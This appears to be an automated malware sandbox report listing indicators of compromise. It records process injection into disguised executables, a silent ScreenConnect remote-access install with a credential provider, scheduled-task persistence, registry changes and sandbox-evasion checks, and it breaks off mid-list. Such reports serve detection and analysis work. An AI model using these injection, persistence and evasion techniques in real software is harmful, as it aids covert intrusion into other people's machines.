description pid Process procid_target PID 2620 set thread context of 2624 2620 $77-Bitdefender.exe 121 PID 3560 set thread context of 3568 3560 Update.exe 125 PID 4612 set thread context of 5084 4612 ApiUpdater.exe 170 PID 2620 set thread context of 5088 2620 rea.exe 169 PID 2988 set thread context of 1268 2988 DBDownloader.exe 149 PID 2620 set thread context of 2624 2620 $77-Bitdefender.exe 121 PID 3560 set thread context of 3568 3560 Update.exe 125 PID 4612 set thread context of 5084 4612 ApiUpdater.exe 170 PID 2620 set thread context of 5088 2620 rea.exe 169 PID 2988 set thread context of 1268 2988 DBDownloader.exe 149 -
Drops file in Program Files directory 25 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.resources msiexec.exe File opened for modification C:\Program Files (x86)\WAN Service\wansv.exe jij.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\system.config msiexec.exe File created C:\Program Files (x86)\Explower.exe server.exe File opened for modification C:\Program Files (x86)\Explower.exe server.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.resources msiexec.exe File created C:\Program Files (x86)\WAN Service\wansv.exe MSystem32.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.en-US.resources msiexec.exe File opened for modification C:\Program Files (x86)\WAN Service\wansv.exe MSystem32.exe File created C:\Program Files (x86)\WAN Service\wansv.exe jij.exe File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.dll msiexec.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{85F34968-1C69-C400-0998-25E265AEE9E4} msiexec.exe File created C:\Windows\Installer\wix{85F34968-1C69-C400-0998-25E265AEE9E4}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\e57d311.msi msiexec.exe File created C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon msiexec.exe File created C:\Windows\SystemTemp\~DF6AEF9D7099DAA0BF.TMP msiexec.exe File opened for modification C:\Windows\TransferRare 1.exe File opened for modification C:\Windows\NavyPromising 1.exe File opened for modification C:\Windows\Installer\MSID979.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDC68.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF36878F747018455A.TMP msiexec.exe File opened for modification C:\Windows\HonoluluSyndrome 1.exe File opened for modification C:\Windows\ViBases 1.exe File created C:\Windows\Installer\e57d30f.msi msiexec.exe File opened for modification C:\Windows\Installer\e57d30f.msi msiexec.exe File created C:\Windows\SystemTemp\~DFA4A0AD2D1EBD8338.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF969AC64503A22B52.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSID699.tmp msiexec.exe File opened for modification C:\Windows\OxfordPrintable 1.exe File opened for modification C:\Windows\ImmediatelyBros 1.exe File opened for modification C:\Windows\EscortsNascar 1.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 8 IoCs
pid pid_target Process procid_target 4148 4960 WerFault.exe 126 4992 5584 WerFault.exe 420 1924 6288 WerFault.exe 476 4844 1172 WerFault.exe 396 4148 4960 WerFault.exe 126 4992 5584 WerFault.exe 420 1924 6288 WerFault.exe 476 4844 1172 WerFault.exe 396 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 333.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windows.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language T.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DBDownloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSystem32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jij.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Surrey.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-Bitdefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zoom_invitecode=23884232.zoom.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Enalib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ApiUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DBDownloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ApiUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language noyjhoadw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language access.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BQEHIQAG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2644 PING.EXE 6652 PING.EXE 5508 PING.EXE 5444 PING.EXE 1100 PING.EXE 3080 PING.EXE 956 PING.EXE 5784 PING.EXE 2256 PING.EXE 2396 PING.EXE 3684 PING.EXE 6104 PING.EXE 5536 PING.EXE 3000 PING.EXE 6624 PING.EXE 6548 PING.EXE 6616 PING.EXE 3776 PING.EXE 3256 PING.EXE 4796 PING.EXE 6740 PING.EXE 3728 PING.EXE 2924 PING.EXE 4852 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000097e32746e391c5270000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000097e327460000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090097e32746000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d97e32746000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000097e3274600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 1568 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe -
Modifies registry class 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings ApiUpdater.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc msiexec.exe -
Modifies registry key 1 TTPs 5 IoCs
pid Process 1268 reg.exe 1676 reg.exe 952 reg.exe 3852 reg.exe 6212 reg.exe -
Runs ping.exe 1 TTPs 24 IoCs
pid Process 3684 PING.EXE 5536 PING.EXE 5508 PING.EXE 5444 PING.EXE 2256 PING.EXE 4796 PING.EXE 3000 PING.EXE 6104 PING.EXE 2924 PING.EXE 3256 PING.EXE 956 PING.EXE 5784 PING.EXE 1100 PING.EXE 3728 PING.EXE 3080 PING.EXE 6548 PING.EXE 6616 PING.EXE 6624 PING.EXE 6652 PING.EXE 3776 PING.EXE 4852 PING.EXE 2396 PING.EXE 2644 PING.EXE 6740 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 40 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1452 schtasks.exe 7076 schtasks.exe 6048 schtasks.exe 4020 schtasks.exe 4600 schtasks.exe 4408 schtasks.exe 2460 schtasks.exe 5344 schtasks.exe 5444 schtasks.exe 5716 schtasks.exe 6716 schtasks.exe 6016 schtasks.exe 5352 schtasks.exe 3484 schtasks.exe 5168 schtasks.exe 2816 schtasks.exe 3440 schtasks.exe 3084 schtasks.exe 6408 schtasks.exe 860 schtasks.exe 4660 schtasks.exe 2508 schtasks.exe 5340 schtasks.exe 6096 schtasks.exe 5744 schtasks.exe 4188 schtasks.exe 5308 schtasks.exe 5760 schtasks.exe 5496 schtasks.exe 5240 schtasks.exe 4624 schtasks.exe 5836 schtasks.exe 1932 schtasks.exe 5716 schtasks.exe 240 schtasks.exe 5860 schtasks.exe 5672 schtasks.exe 1456 schtasks.exe 5620 schtasks.exe 5756 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2144 EXCEL.EXE 2144 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 3560 Update.exe 3560 Update.exe 3560 Update.exe 3560 Update.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 4740 windows.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 2116 Enalib.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 4540 T.exe 3896 Powershell.exe 3896 Powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 1104 server.exe 2404 MSystem32.exe 5500 server.exe 1104 server.exe 2404 MSystem32.exe 5500 server.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 2620 $77-Bitdefender.exe 4612 ApiUpdater.exe 2620 rea.exe 2988 DBDownloader.exe 2620 $77-Bitdefender.exe 4612 ApiUpdater.exe 2620 rea.exe 2988 DBDownloader.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3836 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 2416 ._cache_Synaptics.exe Token: SeDebugPrivilege 3560 Update.exe Token: SeDebugPrivilege 860 tasklist.exe Token: SeDebugPrivilege 3848 tasklist.exe Token: SeDebugPrivilege 4340 zoom_invitecode=23884232.zoom.exe Token: SeShutdownPrivilege 2508 msiexec.exe Token: SeIncreaseQuotaPrivilege 2508 msiexec.exe Token: SeSecurityPrivilege 1908 msiexec.exe Token: SeCreateTokenPrivilege 2508 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2508 msiexec.exe Token: SeLockMemoryPrivilege 2508 msiexec.exe Token: SeIncreaseQuotaPrivilege 2508 msiexec.exe Token: SeMachineAccountPrivilege 2508 msiexec.exe Token: SeTcbPrivilege 2508 msiexec.exe Token: SeSecurityPrivilege 2508 msiexec.exe Token: SeTakeOwnershipPrivilege 2508 msiexec.exe Token: SeLoadDriverPrivilege 2508 msiexec.exe Token: SeSystemProfilePrivilege 2508 msiexec.exe Token: SeSystemtimePrivilege 2508 msiexec.exe Token: SeProfSingleProcessPrivilege 2508 msiexec.exe Token: SeIncBasePriorityPrivilege 2508 msiexec.exe Token: SeCreatePagefilePrivilege 2508 